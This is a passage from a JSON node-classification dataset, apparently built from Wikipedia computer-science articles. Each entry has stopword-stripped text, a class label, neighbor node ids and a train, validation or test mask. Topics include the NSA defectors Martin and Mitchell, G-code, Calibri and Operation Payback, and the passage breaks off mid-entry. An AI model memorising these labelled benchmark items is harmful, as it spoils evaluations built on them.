kami seya stayed japan another year working army security agency following navy service earned bachelor degree stanford university martin mitchell became friends navy service naval communications intercept facility kami seya japan kept touch returned school navy service encountered one another recruited national security agency nsa 1957 years nsa uneventful martin gained enough recognition twice awarded scholarships study towards master degree mitchell martin became disturbed learned american incursions foreign airspace realized congress unaware nsa-sponsored flights february 1959 violation nsa rules tried report knew congressman expressed frustration information receiving nsa ohio democrat wayne hays december 1959 pair visited cuba without notifying superiors required nsa procedures june 25 1960 mitchell martin left u.s. mexico traveled havana sailed russian freighter soviet union august 5 pentagon announced returned vacation said likelihood gone behind iron curtain september 6 1960 appeared joint news conference house journalists moscow announced requested asylum soviet citizenship new york times described long-time bachelor friends reported smiled described social advantages anticipated soviet union prepared statement said talents women encouraged utilized much greater extent soviet union united states feel enriches soviet society makes soviet women desirable mates conference defectors made public first time mission activities nsa prepared statement written said without consulting government soviet union said united states government unscrupulous accused soviet government also said particularly attacked views general thomas s. power recently told congressional committee u.s. needed maintain nuclear first-strike capability senator barry goldwater opposition banning nuclear tests negotiating disarmament treaty contrast said would attempt crawl moon thought would lessen threat atomic war u.s. recently admitted sending reconnaissance flights foreign countries recent years martin mitchell said knew navy service flights occurred early 1952–1954 detailed u.s. c-130 flight soviet armenia soviets brought contended designed gain understanding soviet defenses therefore represented american interest attacking soviets rather defending also complained restrictions freedom u.s. government confiscation mail particularly freedom theists whose political convictions unpopular response american government called mitchell martin charges completely false department defense called turncoats tools soviet propaganda one mentally sick obviously confused also characterized positions nsa junior mathematicians issue pair sexuality raised dismissed report representative francis e. walter democrat pennsylvania chairman house un-american activities committee denied made allegation reported news agency one men described homosexual report federal bureau investigation pentagon spokesman told reporters nothing mitchell martin personnel records suggest homosexuality sexual perversion next day congressman walter explicitly stated source trusted told two defectors known acquaintances 'sex deviates charge promptly picked press resulted immediately stories homosexuals recruiting sexual deviates jobs federal government hearst newspapers referred martin mitchell two defecting blackmailed homosexual specialists love team time reported review security checks turned mitchell visit psychiatrist presumably concern homosexual tendencies interview soviet news agency tass december 1960 expressed belief american espionage russia u.s. allies neutral nations would continue unchanged despite inauguration new american president january 1961 according later government report martin—who fluent russian—studied leningrad university saint petersburg state university used name vladimir sokolodsky married soviet citizen divorced 1963 later told russian newspaper defection foolhardy also expressed disappointment russians trust important work occasionally sought help american visitors arranging repatriation including donald duffy vice president kaiser foundation bandleader benny goodman another occasion told american defecting believed vision russia presented propaganda publications like ussr soviet life 1975 source told u.s. government martin totally skids 1979 inquired american consulate repatriation result case examined stripped american citizenship next denied permission immigrate u.s. denied tourist visa martin eventually left soviet union died cancer mexico january 17 1987 tijuana hospital del mar buried u.s. less known mitchell renounced u.s. citizenship remained soviet union rest life married galina vladimirovna yakovleva member piano department faculty leningrad conservatory became alcoholic regretted decision mitchell died november 2001 buried st. petersburg defections another life inside u.s. intelligence community meeting national security council october 1960 officials considered response martin-mitchell affair attorney general william p. rogers believed soviets list homosexuals use recruiting blackmail efforts martin mitchell part organized group several meeting thought polygraph tests would help prevent hiring homosexuals president eisenhower wanted central authority coordinate government lists homosexuals order prevent another occurrence nsa needed understand motivated defectors initial investigation turned little interest notes psychological counseling sessions 1940s described martin brilliant emotionally immature offered diagnosis beginning character neurosis schizoid tendencies mentioned likely sadistic mitchell told nsa questioned long starting work agency experimented sexually teenager dogs chickens immediate nsa response focused sexual issues july 1961 agency announced purged 26 employees identified sexual deviates though added qualification homosexuals yet series nsa investigations gave little credit role sexuality mitchell martin defection 1961 nsa report called close friends somewhat anti-social egotistical arrogant insecure young men whose place society much lower believed deserved greatly inflated opinions concerning intellectual attainments talents 1963 another nsa report found clear motive recruited foreigners termed defection impulsive nsa files obtained journalists seattle weekly 2007 cited definitive testimony part women acquaintances attested heterosexuality perversions recorded martin all-controlling sadomasochism occasionally watched women sex sex multiple female partners 1962 congressman walters house un-american activities committee huac concluded 13-month investigation issued report defections mitchell told psychiatrist affairs men women troubled sexual identity report referred homosexual problems report never identified rationale mitchell martin defections focused inadequacy investigations granted security clearances despite evidence homosexuality sexual abnormality atheism communist sympathies part one men report made series recommendations respect nsa hiring practices security investigations promptly adopted agency later government analyses went beyond characterizations huac account unaware nsa unpublished analysis despite contrary evidence 1991 study pentagon defense security service—still use 2007—called martin mitchell publicly known homosexuals",
    "neighbors": [
      3495,
      6344,
      8750,
      7887,
      208,
      4595,
      7893
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4119,
    "label": 4,
    "text": "Network_security_policy:network security policy network security policy nsp generic document outlines rules computer network access determines policies enforced lays basic architecture company security/ network security environment document usually several pages long written committee security policy goes far beyond simple idea keep bad guys complex document meant govern data access web-browsing habits use passwords encryption email attachments specifies rules individuals groups individuals throughout company security policy keep malicious users also exert control potential risky users within organization first step creating policy understand information services available users potential damage whether protection already place prevent misuse addition security policy dictate hierarchy access permissions grant users access necessary completion work writing security document major undertaking good start achieved using template national institute standards technology provides security-policy guideline policies could expressed set instructions could understood special purpose network hardware dedicated securing network",
    "neighbors": [
      3941,
      939,
      8267,
      3629,
      10417,
      9524,
      11188,
      119,
      3643,
      5373,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 4120,
    "label": 5,
    "text": "Joost:joost joost internet tv service created niklas zennström janus friis founders skype kazaa 2007–2008 joost used peer-to-peer tv p2ptv technology distribute content mozilla-based desktop player late 2008 migrated use flash-based web player instead joost began development 2006 working code name venice project zennström friis assembled teams 150 software developers six cities around world including new york city london leiden toulouse according zennström 25 july 2007 press conference skype held tallinn estonia joost signed million beta testers launch scheduled end 2007 team signed warner music indianapolis motor speedway productions indianapolis 500 indycar series production company endemol beta february 2007 viacom entered deal company distribute content media properties including mtv networks black entertainment television bet film studio paramount pictures company went restructuring several times sold assets 2009 suspended operations 2012 program based p2ptv technology expected deliver relaying near-tv resolution images turned pc instant on-demand tv need additional set-up box news updates discussion forums show ratings multi-user chat sessions often linked active stream/channel made possible use semi-transparent widget overlays initial version software based xulrunner audio management re-used zap media kit peer peer layer on-demand video came joltid company also provided peer peer layer skype peer peer layer live video developed scratch first trial run broadcasting march madness 2008 video playback used corecodec coreavc h.264 video decoder joost soft launched widget api august 29 2007 non-copyleft open source license encouraged third party developers create tools tv 2.0 platform 2009 joost released special website playstation 3 internet browser took advantage browser full screen x button capabilities holding x button could choose various video options using d-pad opposed streaming technology clients get feed server p2p tv technology differs sense servers serve handful clients clients turn propagate stream downstream clients moves distribution costs channel owner user co-owners skype friis zennström received part 2.6 billion cash payment ebay acquired skype 2005 easily covered development marketing cost joost venture week launching service founders announced raised additional 45 million sequoia capital backed yahoo google youtube index ventures early investor skype li ka-shing hong kong tycoon cbs us media group taken “ small minority ” stakes start-up viacom also understood among partners although nature backing disclosed joost service ad-supported advertising analogous shown traditional tv according former ceo fredrik de wahl joost 40 advertisers including sony pictures bmw sprite aside injected video-advertisements served additional interactive advertisements via overlays short pop-ups clickable viacom inc. joost entered content provider agreement joost platform february 20 2007 agreement divisions viacom including mtv networks bet networks paramount pictures license television theatrical programming joost came shortly viacom requested 100,000 potentially infringing videos removed youtube.com showed preference viacom joost platform youtube joost licensing agreements place ministry sound tv aardman animation warner music production company endemol fremantle media rdf media diversion media cbs centerstaging rehearsals.com may 1 2007 joost signed deal distribute nhl content including full game replays stanley cup finals vintage games bollywood distributor eros international also announced deal joost 2007 majority content joost restricted users united states america due lack international licensing arrangements company first ceo frederick de wahl succeeded mike volpi june 2007 volpi stepped july 2009 amidst round job cuts succeeded matt zelesko volpi blamed content companies sidelining joost december 17 2008 joost sent email customers explaining project moving website-only model joost application would stop working friday december 19 joost uk subsidiary liquidated 2009 november 24 2009 adconion media group announced would purchasing company assets undisclosed amount companies index ventures major investor 30 april 2012 joost.com website announced without explanation re-evaluating joost.com purpose services near-term decided suspend site allow full re-evaluation may 2012 adconion rebranded folded joost media smartclip another company previously acquired zennstrom written post-mortem analysis company 2016 book founders fail",
    "neighbors": [
      10368,
      8833,
      8937,
      7983,
      499,
      10995,
      8413,
      10270
    ],
    "mask": "None"
  },
  {
    "node_id": 4121,
    "label": 9,
    "text": "G-code:g-code g-code also rs-274 many variants common name widely used numerical control nc programming language used mainly computer-aided manufacturing control automated machine tools g-code language people tell computerized machine tools make something defined g-code instructions provided machine controller industrial computer tells motors move fast move path follow two common situations within machine tool lathe mill cutting tool moved according instructions toolpath cutting away material leave finished workpiece and/or unfinished workpiece precisely positioned 9 axes around 3 dimensions relative toolpath either move relative concept also extends noncutting tools forming burnishing tools photoplotting additive methods 3d printing measuring instruments first implementation numerical control programming language developed mit servomechanisms laboratory late 1950s decades since many implementations developed many commercial noncommercial organizations g-code often used implementations main standardized version used united states settled electronic industries alliance early 1960s final revision approved february 1980 rs-274-d countries standard iso 6983 often used many european countries use standards example din 66025 used germany pn-73m-55256 pn-93/m-55251 formerly used poland extensions variations added independently control manufacturers machine tool manufacturers operators specific controller must aware differences manufacturer product one standardized version g-code known bcl binary cutter language used machines developed mit bcl developed control cnc machines terms straight lines arcs 1970s 1990s many cnc machine tool builders attempted overcome compatibility difficulties standardizing machine tool controllers built fanuc siemens another market dominator cnc controls especially europe 2010s controller differences incompatibility troublesome machining operations developed cad/cam applications output appropriate g-code called post specific machine tool cnc machines use conversational programming wizard-like programming mode either hides g-code completely bypasses use g-code popular examples okuma advanced one touch aot southwestern industries prototrak mazak mazatrol hurco ultimax winmax haas intuitive programming system ips mori seiki caps conversational software g-code began limited language lacked constructs loops conditional operators programmer-declared variables natural-word-including names expressions use unable encode logic way connect dots programmer figured many dots locations longhand latest implementations g-code include macro language capabilities somewhat closer high-level programming language additionally primary manufacturers e.g. fanuc siemens heidenhain provide access plc data axis positioning data tool data via variables used nc programs constructs make easier develop automation applications g-codes also called preparatory codes word cnc program begins letter g. generally code telling machine tool type action perform codes type codes thought like registers computer pointed years term g-code imprecise g one many letter addresses complete language comes literal sense term referring one letter address specific codes formed example g00 g01 g28 every letter english alphabet used somewhere language nevertheless g-code metonymically established common name language letter addresses used milling turning used bold letters seen frequently throughout program sources smid 2008 smid 2010 green et al 1996 sources smid 2008 smid 2010 green et al 1996 sources smid 2008 smid 2010 green et al 1996 older controls require codes separate blocks line generic program demonstrates use g-code turn part 1 diameter 1 long assume bar material machine bar slightly oversized length diameter bar protrudes 1 face chuck caution generic might work real machine pay particular attention point 5 several points note g-code programming environments evolved parallel general programming—from earliest environments e.g. writing program pencil typing tape puncher latest environments combine cad computer-aided design cam computer-aided manufacturing richly featured g-code editors g-code editors analogous xml editors using colors indents semantically plus features aid user ways basic text editors ca n't cam packages analogous ides general programming two high-level paradigm shifts 1 abandoning manual programming nothing pencil text editor human mind systems generate g-code automatically via postprocessors analogous development visual techniques general programming 2 abandoning hardcoded constructs parametric ones analogous difference general programming hardcoding constant equation versus declaring variable assigning new values object-oriented approach general macro parametric cnc programming uses human-friendly variable names relational operators loop structures much general programming capture information logic machine-readable semantics whereas older manual cnc programming could describe particular instances parts numeric form macro programming describes abstractions easily apply wide variety instances difference many analogues computing era advent 1 creating text bitmaps versus using character encoding glyphs 2 abstraction level tabulated engineering drawings many part dash numbers parametrically defined one drawing parameter table 3 way html passed phase using content markup presentation purposes matured toward css model cases higher layer abstraction introduced missing semantically step-nc reflects theme viewed yet another step along path started development machine tools jigs fixtures numerical control sought build skill tool recent developments g-code step-nc aim build information semantics tool idea new beginning numerical control concept end-to-end cad/cam environment goal early technologies dac-1 apt efforts fine huge corporations like gm boeing however small medium enterprises went era simpler implementations nc relatively primitive connect-the-dots g-code manual programming cad/cam improved disseminated throughout industry machine tool great number axes spindles tool stations difficult program well manually done years easily challenge existed decades cnc screw machine rotary transfer programming also arises today newer machining centers called turn-mills mill-turns multitasking machines multifunction machines cad/cam systems widely used cnc programming g-code requires cad/cam opposed manual programming practical competitive market segments classes machines serve smid says combine axes additional features amount knowledge required succeed quite overwhelming say least time however programmers still must thoroughly understand principles manual programming must think critically second-guess aspects software decisions since mid-2000s seems death manual programming writing lines g-code without cad/cam assistance may approaching however currently contexts manual programming obsolete plenty cam programming takes place nowadays among people rusty incapable manual programming—but true cnc programming done done well efficiently without knowing g-code tailoring refining cnc program machine area practice easier efficient edit g-code directly rather editing cam toolpaths re-post-processing program making living cutting parts computer-controlled machines made easier harder cad/cam software efficiently written g-code challenge cam software ideally cnc machinist know manual cam programming well benefits brute-force cam elegant hand programming used needed many older machines built limited computer memory time memory expensive 32k considered plenty room manual programs whereas modern cam software post gigabytes code cam excels getting program quick may take machine memory take longer run often makes quite valuable machining low quantity parts balance must struck time takes create program time program takes machine part become easier faster make parts newer machines lots memory taken toll hand programmers manual machinists given natural turnover retirement realistic expect maintain large pool operators highly skilled manual programming commercial environment mostly longer provide countless hours deep experience took build skill yet loss experience base appreciated times pool sorely missed cnc runs still optimized without skill list selection except key terms mostly avoids duplicating many abbreviations listed engineering drawing abbreviations symbols see",
    "neighbors": [
      9345,
      2691,
      996,
      9349,
      8262,
      9795,
      11625,
      7341,
      9330,
      1590,
      9911,
      4121,
      8923,
      7964
    ],
    "mask": "None"
  },
  {
    "node_id": 4122,
    "label": 9,
    "text": "Macintosh_Common_Lisp:macintosh common lisp macintosh common lisp mcl implementation ide common lisp programming language various versions mcl run classic mac os m68k ppc mac os x versions mcl including 5.1 proprietary version 5.2 open sourced 2009 new different version mcl open sourced rmcl rmcl based mcl 5.1 run rosetta intel-based macs mcl famous integration macintosh toolbox later apple carbon allowed direct access mac os functionality directly lisp achieved low-level interface allowed direct manipulation native mac os data structures lisp together high-level interface convenient use 2001 article dr. dobb journal peter norvig wrote mcl favorite ide macintosh platform language serious rival platforms development mcl began 1984 history mcl known different names running 68k-based apple macintosh computers running powerpc-based apple macintosh computers also spawned least one separately maintained fork",
    "neighbors": [
      10752,
      11269,
      2062,
      9231,
      1042,
      9749,
      8728,
      4633,
      8226,
      2105,
      6201,
      6717,
      576,
      8258,
      8771,
      8262,
      1613,
      9299,
      3675,
      7267,
      8293,
      3176,
      2666,
      2667,
      5751,
      7805,
      9865,
      9877,
      4779,
      5803,
      2225,
      8883,
      7867,
      4799,
      7880,
      8908,
      205,
      7896,
      10463,
      7392,
      7904,
      11488,
      5360,
      5361,
      8435,
      6906,
      4865,
      3334,
      6919,
      1301,
      10012,
      3869,
      2335,
      10547,
      311,
      6969,
      11083,
      1365,
      2392,
      6493,
      10083,
      6502,
      3446,
      4992,
      2438,
      7562,
      5519,
      6556,
      6047,
      4516,
      5031,
      1448,
      9128,
      5569,
      6594,
      4550,
      6603,
      11218,
      10712,
      3034,
      3051,
      11255,
      4606
    ],
    "mask": "Train"
  },
  {
    "node_id": 4123,
    "label": 2,
    "text": "DCC_Alliance:dcc alliance dcc alliance dcca industry association designed promote common subset debian gnu/linux operating system multiple companies within consortium could distribute founded ian murdock 2005 wound 2007 main force behind dcc alliance ian murdock original founder debian project dcc alliance formed whilst murdock ceo progeny linux systems remained key spokesperson consortium visible existence founding dcc alliance announced linuxworld san francisco 9 august 2005 following number pre-announcements stated intention assemble standards-based core debian provide predictable release cycle linux standards base compliance dcc alliance shipped first code 6 months original pre-announcements providing linux standards base lsb 3.0 compliant set program packages based available debian alliance primary goals two classes membership dcc alliance membership remained open additional organizations interest debian-based solutions visible absent involvement ubuntu distribution declined join alliance ubuntu founder mark shuttleworth stated 2006 believe dcc alliance future one founding members mepis later left dcca citing creative differences mepis transitioned simplymepis linux distribution debian unstable/dcca-provided core ubuntu-based one 2006 ian murdock left dcc alliance chair linux standard base workgroup later moved employment sun microsystems 2007 progeny original driver behind consortium wound 2006 xandros still claiming xandros leads engineering team dcca originally formed names given media debian core consortium debian common core following trademark notification debian project name withdrawn replaced—without formal announcement—by dcc alliance ian murdock explained longer treated abbreviation debian dcc —becoming recursive acronym dcc common core notably debian trademark denied mr. murdock dcc alliance originates combination -ian part mr. murdock given name concatenated wife name debra murdock decision infringement trademark fell branden robinson debian project leader dpl employee progeny linux systems mr. murdock time decision made mr. robinson stated would represent conflict interest",
    "neighbors": [
      9665,
      5410,
      390,
      10687,
      5962,
      9324,
      8690,
      7027,
      9074,
      8476,
      8727,
      5721,
      11263,
      3068,
      9693,
      543
    ],
    "mask": "Test"
  },
  {
    "node_id": 4124,
    "label": 3,
    "text": "Ingenic_Semiconductor:ingenic semiconductor ingenic semiconductor chinese fabless semiconductor company based beijing china founded 2005 purchased licenses mips architecture instruction sets 2009 design cpu-microarchitectures based also design system chip products including cpus licensed semiconductor intellectual property blocks third parties vivante corporation commission fabrication integrated circuits semiconductor fabrication plants sell xburst cpu microarchitecture based upon mips32 revision 1 respectively mips32 revision 2 instruction set implements 8-stage pipeline xburst cpu technology consists 2 parts ingenic semiconductor purchased mips64 instruction set license designed microarchitecture based xburst2 xburst2 dual-issue/dual-threaded cpu design development basically completed first half 2014 announced summer 2013 socs incorporating xburst microarchitecture xburst1-based socs commonly used tablet computers portable media players digital photo frames gps devices jz4730 cpu used skytone alpha-400 variants jz4720 utilized copyleft hardware project ben nanonote another popular device dingoo gaming handheld uses jz4732 de facto jz4740 game gadget using jz4750 velocity micro t103 cruz t301 cruz 7-inch android 2.0 tablets used jz4760 jz4770 soc used several ainol novo 7 android tablets 3q tablet pc qoo ic0707a/4a40 jz4770 soc also used dedicated handheld neogeo-x open source handheld gcw zero running opendingux jz4780 used imgtec mips based single-board computer sbc creator ci20",
    "neighbors": [
      3585,
      4098,
      11396,
      8327,
      8711,
      6925,
      398,
      783,
      1682,
      11282,
      7445,
      410,
      9851,
      8481,
      5028,
      6057,
      426,
      938,
      2349,
      3117,
      8237,
      9391,
      5681,
      3511,
      1849,
      9913,
      10303,
      6978,
      7234,
      6981,
      3911,
      1480,
      11080,
      10316,
      1624,
      2788,
      1766,
      6247,
      6250,
      6252,
      6253,
      9581,
      1776,
      6256,
      5237,
      760,
      6009,
      3451
    ],
    "mask": "None"
  },
  {
    "node_id": 4125,
    "label": 3,
    "text": "Ian_Cullimore:ian cullimore ian h. s. cullimore english-born mathematician computer scientist influential pocket pc arena cullimore degree mathematics king college london phd cognitive computer science university sussex original founder 1985 main inventor pocket pc became atari portfolio originally known dip pocket pc 1989 dip research ltd. acquired phoenix technologies 1994 1988 cullimore also one founders vice president software poqet computer corporation silicon valley developed poqet pc interest pdas sparked early times psion working first organiser products also original instigator pc card formerly pcmcia card movement came decision use then-emerging credit card memories design atari portfolio founding poqet major investment fujitsu decision made use 68-pin jeida card successfully persuaded board poqet set industry standards organization pcmcia promote standard cullimore wrote parts pcmcia driver stack netware palmdos 1.0 variant digital research dr dos tailored specifically battery powered mobile pcs 1992",
    "neighbors": [
      6090,
      178
    ],
    "mask": "None"
  },
  {
    "node_id": 4126,
    "label": 4,
    "text": "KeepVault:keepvault keepvault online backup service perform online local backups windows-based personal computers servers keepvault uses storage-based pricing model allows offer unlimited users devices one account keepvault technology uses end-to-end encryption files accessed computers via web keepvault first created proxure 2006 january 2012 proxure acquired authentec inc following authentec inc. ’ acquisition apple inc. keepvault acquired group original developers became independent company keepvault offers windows desktop application windows server add-in two plan types home professional well free local backup 2007 keepvault early oem vendor backup microsoft launched windows home server keepvault shipped hp data vault hp mediasmart servers starting 2013 keepvault dashboard add-in preinstalled western digital sentinel server series joint business community effort keepvault launched backup awareness week may 2014 “ backup week ” designed educate public risks data loss ways protect data 2008 bloggers complained end unlimited data plans since keepvault taken position unlimited plans unsustainable",
    "neighbors": [
      6565,
      838,
      1358,
      7983,
      2196
    ],
    "mask": "None"
  },
  {
    "node_id": 4127,
    "label": 2,
    "text": "Cambria_(typeface):cambria typeface cambria transitional serif typeface commissioned microsoft distributed windows office designed dutch typeface designer jelle bosma 2004 input steve matteson robin nicholas intended serif font suitable body text readable printed small displayed low-resolution screen even spacing proportions part cleartype font collection suite fonts various designers released windows vista start letter c reflect designed work well microsoft cleartype text rendering system text rendering engine designed make text clearer read lcd monitors fonts group calibri candara consolas constantia corbel diagonal vertical hairlines serifs relatively strong horizontal serifs small intend emphasize stroke endings rather stand principle noticeable italics lowercase characters subdued style somewhat condensed average font kind profile bosma monotype website commented one defining features typeface contrast heavy vertical serifs hairlines – keep font sturdy ensures design preserved small sizes – relatively thin horizontals ensure typeface remains crisp used larger sizes bosma describes transitional slab-serif hybrid many aspects design somewhat blocky render well screen full stops square rather round designers recommended avoiding using printed text designer matthew butterick described monotonous attractive paper bosna compared optical sizes fonts designed printed small design bit like old metal type font days sizes drawing small sizes wider lower contrast compared large fonts design optical correction sense cambria like small size font except may also used large sizes cleartype fonts lining figures text figures offered lining figures default shown sample image variant designed mathematical scientific texts replacement times new roman cambria math first font implement opentype math extension inspired tex led jelle bosma agfa monotype ross mills tiro typeworks project planned development cambria started cambria math developed three stages cambria distributed windows versions since windows vista microsoft office versions since microsoft office 2007 windows microsoft office 2008 mac microsoft office 2007 viewers converters cambria regular cambria math packaged together truetype collection ttc file microsoft office 2008 mac include cambria math omml supported therefore macintosh version cambria packaged individual truetype font ttf files rather single ttc file font along calibri candara consolas corbel constantia also distributed microsoft excel viewer microsoft powerpoint viewer microsoft office compatibility pack microsoft windows open xml file format converter mac use operating systems gnu/linux cross-platform use web use available freeware typeface licensed ascender corporation use end users consumer electronics device manufacturers typeface also licensed monotype imaging printer manufacturers part vista 8 font set package 2013 part chrome google released freely-licensed font called caladea metric-compatible cambria i.e replace document without changing layout based cambo font developed argentine type foundry huerta tipográfica despite metric-compatible caladea covers much smaller language range e.g n't support cyrillic greek advanced typographic features like ligatures old style numerals fractions cambria math used presentation office mathml equations microsoft office 2007 later free typesetting systems xetex luatex make direct use cambria math alternative traditional tex mathematical fonts cambria available use google google drive suite web applications",
    "neighbors": [
      2593,
      4130,
      9539,
      7973,
      8422,
      1098,
      4138,
      2221,
      4141,
      1487,
      2864,
      6797,
      3538,
      4146,
      4148,
      8374,
      9654
    ],
    "mask": "Test"
  },
  {
    "node_id": 4128,
    "label": 4,
    "text": "Differential_fault_analysis:differential fault analysis differential fault analysis dfa type side channel attack field cryptography specifically cryptanalysis principle induce faults —unexpected environmental conditions—into cryptographic implementations reveal internal states example smartcard containing embedded processor might subjected high temperature unsupported supply voltage current excessively high overclocking strong electric magnetic fields even ionizing radiation influence operation processor processor may begin output incorrect results due physical data corruption may help cryptanalyst deduce instructions processor running internal data state des triple des 200 single-flipped bits necessary obtain secret key dfa also applied successfully aes cipher many countermeasures proposed defend kind attacks based error detection schemes",
    "neighbors": [
      7556,
      2567,
      3084,
      2957,
      7056,
      9745,
      658,
      660,
      1173,
      1941,
      4389,
      10662,
      169,
      11185,
      2357,
      10806,
      9528,
      9541,
      10315,
      6863,
      8273,
      10963,
      212,
      9556,
      2265,
      7643,
      9697,
      8674,
      618,
      1898,
      4334,
      881,
      1654,
      7161,
      7034,
      892
    ],
    "mask": "Test"
  },
  {
    "node_id": 4129,
    "label": 4,
    "text": "Commwarrior:commwarrior commwarrior symbian bluetooth worm first spread via multimedia messaging service mms bluetooth worm affects nokia series 60 software platform commwarrior particularly effective via mms vector used infect phones appeared though sent source known victim leading even security-conscious users open infected message actually message sent random contact sender address book message opened virus attempts install phone via sis file runs worm executed every time phone switched secondary method infection create malicious .sis file compromised phone per minute thereafter worm attempts send file phone bluetooth enabled according sophos installation program one six chance displaying following text commwarrior v1.0 c 2005 e10d0r",
    "neighbors": [
      11277,
      7246,
      9055
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4130,
    "label": 2,
    "text": "Calibri:calibri calibri sans-serif typeface family designed luc de groot 2002–2004 released general public 2007 microsoft office 2007 windows vista office 2007 replaced times new roman default typeface word replaced arial default powerpoint excel outlook wordpad de groot described subtly rounded design warm soft character calibri part cleartype font collection suite fonts various designers released windows vista start letter c reflect designed work well microsoft cleartype text rendering system text rendering engine designed make text clearer read liquid-crystal display monitors fonts group cambria candara consolas constantia corbel calibri features subtly rounded stems corners visible larger sizes sloped form true italic handwriting influences common modern sans-serif typefaces typeface includes characters latin latin extended greek cyrillic scripts calibri makes extensive use sophisticated opentype formatting features range ligatures well lining text figures indices numbers enclosed circles 20 alternate f g accessible enabling fourth fifth stylistic sets features calibri remain unsupported office including true small caps all-caps spacing superscript subscript glyphs ability create arbitrary fractions may accessed using programs adobe indesign one potential source confusion calibri visible homoglyph pair easily confused characters lowercase letter l uppercase letter l latin script effectively indistinguishable true many common fonts however design clear similarities de groot famous much extensive commercial family thesans although straight ends rather rounding calibri default typeface microsoft office much microsoft software joe friend program manager word office 2007 release explained decision switch calibri caused desire make default font one optimised towards onscreen display believed documents would never printed would solely consumed digital device achieve modern look long development windows vista calibri development – 2002 2004 – occurred several years release os first presented 2004 beta windows vista codenamed longhorn first became available use beta 2 version office 2007 released may 23 2006 calibri rest cleartype font collection finally released general public january 30 2007 since released microsoft software environments calibri also distributed microsoft excel viewer microsoft powerpoint viewer microsoft office compatibility pack microsoft windows open xml file format converter mac use operating systems cross-platform web use calibri licensed ascender corporation parent company monotype imaging font calibri light introduced microsoft windows 8 added windows 7 server 2008 part software update microsoft word 2013 onwards calibri calibri light default fonts body text headings respectively calibri light also default font headings powerpoint 2013 due calibri widespread use microsoft office documents google released freely-licensed font called carlito metric-compatible calibri part chromeos carlito font metrics calibri chromeos users correctly display print document designed calibri without disrupting layout carlito based prior open-source typeface lato without de groot involvement calibri tdc2 2005 award type directors club type system category calibri position default font office many cases reported documents shown forged thanks purported creation date calibri available general public 2017 font came public attention evidence pakistani government-related panama papers case also known fontgate document supposedly signed february 2006 found typed calibri. ref name= thenextweb/11july2017 /ref de groot said really zero chance document genuine",
    "neighbors": [
      2593,
      9539,
      7973,
      8422,
      1098,
      4138,
      1581,
      2221,
      1487,
      2864,
      4141,
      3538,
      4146,
      4148,
      6797,
      8374,
      9654,
      4127
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4131,
    "label": 0,
    "text": "Jun'ichi_Tsujii:jun'ichi tsujii tsujii received bachelor engineering master engineering ph.d degrees electrical engineering kyoto university 1971 1973 1978 respectively assistant professor associate professor kyoto university accepting position professor computational linguistics university manchester institute science technology umist 1988 president association computational linguistics acl 2006 permanent member international committee computational linguistics iccl since 1992 since may 2015 tsujii director artificial intelligence research center national institute advanced industrial science technology japan tsujii previously principal researcher microsoft research asia msra joining msra professor university tokyo belonged school inter-faculty initiative informatics graduate school information science technology tsujii also visiting professor scientific advisor national centre text mining nactem university manchester united kingdom 14 may 2010 tsujii awarded medals honor purple ribbon one japan highest awards presented influential contributors fields art academics sports september 2014 tsujii awarded funai achievement award forum information technology fit took place university tsukuba award presented distinguished individuals engaged research related business activities field information technology produced excellent achievements field still active leading positions strong impact young students researchers december 2014 tsujii named acl fellow recognition significant contributions mt parsing unification-based grammar text mining biology",
    "neighbors": [
      9379,
      7780,
      5288,
      7724,
      8440
    ],
    "mask": "Test"
  },
  {
    "node_id": 4132,
    "label": 2,
    "text": "Nokia_5250:nokia 5250 nokia 5250 budget nokia resistive touchscreen smartphone running symbian v9.4 operating system s60 5th edition user interface price tax subsidies €115 announced august 2010 available china eurasia europe india latin america middle east south east asia pacific region small compact comes preloaded guitar hero mobile series 5 cnet asia praised resolution budget price criticized lack 3g capabilities relying gsm edge",
    "neighbors": [
      1537,
      8577,
      6276,
      3205,
      11271,
      11655,
      9359,
      1424,
      529,
      2449,
      659,
      8083,
      10770,
      5143,
      2072,
      7063,
      5274,
      5019,
      5659,
      669,
      8472,
      11545,
      4003,
      6310,
      167,
      40,
      1833,
      3626,
      5290,
      10410,
      9137,
      10802,
      7220,
      821,
      5175,
      7866,
      1083,
      1216,
      1728,
      7617,
      4291,
      7877,
      10053,
      199,
      967,
      9292,
      7246,
      1615,
      4305,
      5201,
      2259,
      6996,
      7253,
      854,
      6870,
      10583,
      5211,
      6748,
      1633,
      9443,
      3300,
      4324,
      7399,
      8423,
      6505,
      10599,
      109,
      5998,
      1776,
      8433,
      1533
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4133,
    "label": 4,
    "text": "Operation_Payback:operation payback operation payback coordinated decentralized group attacks high-profile opponents internet piracy internet activists using anonymous moniker operation payback started retaliation distributed denial service ddos attacks torrent sites piracy proponents decided launch ddos attacks piracy opponents initial reaction snowballed wave attacks major pro-copyright anti-piracy organizations law firms individuals following united states diplomatic cables leak december 2010 organizers commenced ddos attacks websites banks withdrawn banking facilities wikileaks 2010 several bollywood companies hired aiplex software launch ddos attacks websites respond takedown notices piracy activists created operation payback september 2010 retaliation original plan attack aiplex software directly upon finding hours planned ddos another individual taken firm website operation payback moved launching attacks websites copyright stringent organisations motion picture association america mpaa international federation phonographic industry giving two websites combined total downtime 30 hours following two days operation payback attacked multitude sites affiliated mpaa recording industry association america riaa british phonographic industry law firms davenport lyons dunlap grubb weaver us copyright group also attacked september 21 2010 website united kingdom law firm subjected ddos attack part operation payback asked attacks andrew crossley owner acs law said hours far concern fact train turning 10 minutes late queue coffee wasting time sort rubbish site came back online 350mb file backup site visible anyone short period time backup included copies emails sent firm downloaded made available various peer-to-peer networks websites including pirate bay emails contained unencrypted excel spreadsheets listing names addresses people acs law accused illegally sharing media one contained 5,300 sky broadband customers accused illegally sharing pornography another contained details 8,000 sky customers 400 plusnet customers accused infringing copyright music sharing peer-to-peer networks alleged breach data protection act become part ongoing investigation acs law information commissioner office september 30 leesburg virginia office dunlap grubb weaver law firm – also business u.s copyright group – evacuated police emailed bomb threat received believed event could connected anonymous non-related copyright law firms sites websheriff.com also attacked attacks originally organized internet relay chat channel attacks also became popular topic twitter september 27 2010 ddos attack australian federation copyright theft afact unintentionally brought 8,000 small websites hosted server september 2010 attempt ensure portuguese citizens ca n't access thepiratebay.org associação comércio audiovisual de portugal acapor filed complaint pirate bay complaint filed general inspection cultural activities part portuguese ministry culture according movie rental association pirate bay directly responsible 15 million illegal downloads portugal every year installing pirate bay block isps acapor hoped decrease financial damage claims pirate 